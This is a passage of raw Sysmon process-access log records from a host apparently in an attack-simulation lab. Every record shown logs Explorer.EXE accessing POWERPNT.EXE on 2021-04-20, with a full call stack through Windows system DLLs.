Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x800000000000000081601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x800000000000000081597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x800000000000000081593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.325{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.325{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.325{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.325{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x800000000000000081589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.325{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.325{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 